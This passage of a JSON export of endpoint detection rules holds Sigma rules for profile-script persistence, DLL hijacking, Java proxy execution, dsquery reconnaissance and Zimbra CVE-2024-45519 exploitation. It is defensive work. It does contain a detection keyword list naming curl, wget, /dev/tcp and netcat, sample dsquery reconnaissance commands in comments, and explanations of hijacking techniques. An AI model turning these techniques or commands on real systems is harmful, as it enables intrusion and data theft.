'/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - 
ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf update'\n - 'dnf upgrade'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? 
/usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_reconfigure:\n - ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n - ProcessParentCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - 
'/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_plesk:\n ProcessCommandLine|startswith:\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install '\n - '/usr/libexec/platform-python -Estt /usr/local/psa/bin/dnf_install '\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_podman:\n - ProcessImage: '/usr/bin/podman'\n - ProcessAncestors|contains: '|/usr/bin/conmon|/usr/bin/podman|'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c 
LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_packagekit:\n ProcessImage:\n - '/usr/libexec/packagekitd'\n - '/usr/lib/packagekit/packagekitd'\n\n exclusion_crio:\n ProcessImage: '/usr/bin/crio'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_puppet:\n ProcessImage|startswith: '/opt/puppetlabs/'\n\n exclusion_buildah:\n ProcessCommandLine: 'storage-untar / */containers/storage/overlay/*'\n\n exclusion_convert2rhel:\n ProcessParentCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9f55b9d-87ee-4d92-ba79-5004d14af637",
"rule_name": "System Profile Modified",
"rule_description": "Detects an attempt to modify the system profile script (/etc/profile) and scripts in the /etc/profile.d/ directory.\nThese scripts contain Linux system-wide environment and startup programs.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to these files.\nIt is recommended to investigate the process that read the file for suspicious activities.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "da7ccf86-060f-4fa0-a574-3dd02a4dc0de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098920Z",
"creation_date": "2026-03-23T11:45:34.098922Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098926Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_settingsynchost.yml",
"content": "title: DLL Hijacking via settingsynchost.exe\nid: da7ccf86-060f-4fa0-a574-3dd02a4dc0de\ndescription: |\n Detects potential Windows DLL Hijacking via settingsynchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'settingsynchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\umpdc.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "da7ccf86-060f-4fa0-a574-3dd02a4dc0de",
"rule_name": "DLL Hijacking via settingsynchost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via settingsynchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "da9eaad8-ad16-4f59-9475-9fab6a794647",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082397Z",
"creation_date": "2026-03-23T11:45:34.082399Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082403Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://windows-internals.com/faxing-your-way-to-system/",
"https://github.com/ionescu007/faxhell",
"https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_prepare_persistence_dll_hijack_ualapi.yml",
"content": "title: Fax/Print Spooler Service DLL Hijack Prepared\nid: da9eaad8-ad16-4f59-9475-9fab6a794647\ndescription: |\n Detects preparation of a DLL hijack of the Fax and the Windows Print Spooler service trying to load the non-existant ualapi.dll DLL from system32 directory.\n The ualapi.dll library is loaded by the Fax and the Spooler Windows service when started and is not present on system by default.\n It is recommended to investigate the loaded DLL, and to look for alerts detecting a spooler hijacking being executed.\nreferences:\n - https://windows-internals.com/faxing-your-way-to-system/\n - https://github.com/ionescu007/faxhell\n - https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2023/09/22\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_create:\n Kind: 'create'\n Path: '?:\\Windows\\System32\\ualapi.dll'\n\n selection_rename:\n Kind: 'rename'\n TargetPath: '?:\\Windows\\System32\\ualapi.dll'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "da9eaad8-ad16-4f59-9475-9fab6a794647",
"rule_name": "Fax/Print Spooler Service DLL Hijack Prepared",
"rule_description": "Detects preparation of a DLL hijack of the Fax and the Windows Print Spooler services, which try to load the non-existent ualapi.dll from the System32 directory.\nThe ualapi.dll library is loaded by the Fax and the Spooler Windows services when started and is not present on the system by default.\nIt is recommended to investigate the loaded DLL, and to look for alerts detecting a spooler hijacking being executed.\n",
"rule_creation_date": "2023-09-22",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dab93a0e-9b6b-4fde-9c39-ed8b5581c37f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080898Z",
"creation_date": "2026-03-23T11:45:34.080900Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080905Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2017/09/27/beyond-good-ol-run-key-part-65/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_java_proxy_execution.yml",
"content": "title: Proxy DLL Execution via Java\nid: dab93a0e-9b6b-4fde-9c39-ed8b5581c37f\ndescription: |\n Detects execution of 'Java.exe' with suspicious command-line arguments indicating DLL execution.\n This binary, which is digitally signed by Oracle, can be used to load malicious DLLs.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to investigate the DLL loaded and the parent proces for suspicious activities.\nreferences:\n - https://www.hexacorn.com/blog/2017/09/27/beyond-good-ol-run-key-part-65/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - OriginalFileName: 'java.exe'\n - Image|endswith: '\\java.exe'\n\n selection_arg:\n CommandLine|endswith:\n - ' -agentlib:*.dll'\n - ' -agentpath:*.dll'\n\n filter_long_commandline:\n CommandLine|endswith:\n - ' -agentlib:* *.dll'\n - ' -agentpath:* *.dll'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dab93a0e-9b6b-4fde-9c39-ed8b5581c37f",
"rule_name": "Proxy DLL Execution via Java",
"rule_description": "Detects execution of 'Java.exe' with suspicious command-line arguments indicating DLL execution.\nThis binary, which is digitally signed by Oracle, can be used to load malicious DLLs.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to investigate the loaded DLL and the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dacb9ce2-0179-4503-b58d-3143cfc42261",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605128Z",
"creation_date": "2026-03-23T11:45:34.605131Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605139Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732952(v=ws.11)?redirectedfrom=MSDN",
"https://www.mandiant.com/resources/blog/apt41-us-state-governments",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/software/S0105/"
],
"name": "t1087_002_dsquery.yml",
"content": "title: Active Directory Discovered via dsquery.exe\nid: dacb9ce2-0179-4503-b58d-3143cfc42261\ndescription: |\n Detects the execution of the Dsquery tool, which is a command-line tool that may be present on some Windows Server.\n Dsquery is a legitimate Windows binary that can be used to query an Active Directory to gather information.\n This tool is often used by attackers during the discovery phase.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732952(v=ws.11)?redirectedfrom=MSDN\n - https://www.mandiant.com/resources/blog/apt41-us-state-governments\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/software/S0105/\ndate: 2022/08/26\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.002\n - attack.s0105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Dsquery\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_dsquery:\n OriginalFileName: 'dsquery.exe'\n\n selection_filter:\n CommandLine|contains:\n - ' -filter '\n - ' /filter '\n - ' -attr '\n - ' /attr '\n\n selection_filter_trust:\n # dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\n CommandLine|contains|all:\n - 'objectClass'\n - 'trustedDomain'\n\n selection_filter_person:\n # dsquery.exe * -filter \"(objectCategory=Person)\" -attr cn title displayName description\n CommandLine|contains|all:\n - 'objectCategory'\n - 'Person'\n\n 
selection_filter_computer:\n # dsquery.exe * -filter \"(objectCategory=Computer)\" -attr cn operatingSystem operatingSystemServicePack operatingSystemVersion\n CommandLine|contains|all:\n - 'objectCategory'\n - 'Computer'\n\n selection_filter_group:\n # dsquery.exe * -filter \"(objectCategory=Group)\" -uc -attr cn sAMAccountName distinguishedName description -limit 0\n CommandLine|contains|all:\n - 'objectCategory'\n - 'Group'\n\n selection_filter_unit:\n # dsquery.exe * -filter \"(objectClass=organizationalUnit)\" -attr ou name whenCreated distinguishedName gPLink -limit 0\n CommandLine|contains|all:\n - 'objectClass'\n - 'organizationalUnit'\n\n selection_subnet:\n # dsquery subnet -limit 0\n CommandLine|contains: ' subnet '\n\n condition: selection_dsquery and ((selection_filter and 1 of selection_filter_*) or selection_subnet)\nfalsepositives:\n - Legitimate administrator action\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dacb9ce2-0179-4503-b58d-3143cfc42261",
"rule_name": "Active Directory Discovered via dsquery.exe",
"rule_description": "Detects the execution of the Dsquery tool, a command-line tool that may be present on some Windows Server systems.\nDsquery is a legitimate Windows binary that can be used to query an Active Directory to gather information.\nThis tool is often used by attackers during the discovery phase.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-08-26",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db057758-949f-44f5-9814-aef16e94ef02",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613147Z",
"creation_date": "2026-03-23T11:45:34.613151Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613158Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.projectdiscovery.io/zimbra-remote-code-execution/",
"https://blog.zimbra.com/2024/10/zimbra-cve-2024-45519-vulnerability-stay-secure-by-updating/",
"https://github.com/Chocapikk/CVE-2024-45519",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "cve_2024_45519_zimbra_rce.yml",
"content": "title: Zimbra CVE-2024-45519 RCE Exploited\nid: db057758-949f-44f5-9814-aef16e94ef02\ndescription: |\n Detects the suspicious creation of child processes by the postjournal service related to the exploitation of a Zimbra vulnerability.\n This behavior is related to the exploitation of the \"exchange compatible journaling\" feature on non-patched Zimbra instances.\n This flaw allows remote unauthenticated attackers to execute arbitrary commands.\n It is recommended to gather more information about the Zimbra instance and to investigate the command-line.\nreferences:\n - https://blog.projectdiscovery.io/zimbra-remote-code-execution/\n - https://blog.zimbra.com/2024/10/zimbra-cve-2024-45519-vulnerability-stay-secure-by-updating/\n - https://github.com/Chocapikk/CVE-2024-45519\n - https://attack.mitre.org/techniques/T1190/\ndate: 2024/10/09\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - cve.2024-45519\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.Zimbra\n - classification.Linux.Exploit.CVE-2024-45519\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.InitialAccess\nlogsource:\n product: linux\n category: process_creation\n\ndetection:\n selection_process:\n ProcessParentImage|endswith: '/postjournal'\n CommandLine|startswith:\n - 'sh -c postalias -q '\n - 'sh -c postmap -q '\n\n selection_command:\n CommandLine|contains:\n - '${IFS}'\n - 'curl'\n - 'wget'\n - '/dev/tcp'\n - '/dev/udp'\n - 'base64'\n - 'openssl'\n - 'perl'\n - 'netcat'\n - ' nc '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db057758-949f-44f5-9814-aef16e94ef02",
"rule_name": "Zimbra CVE-2024-45519 RCE Exploited",
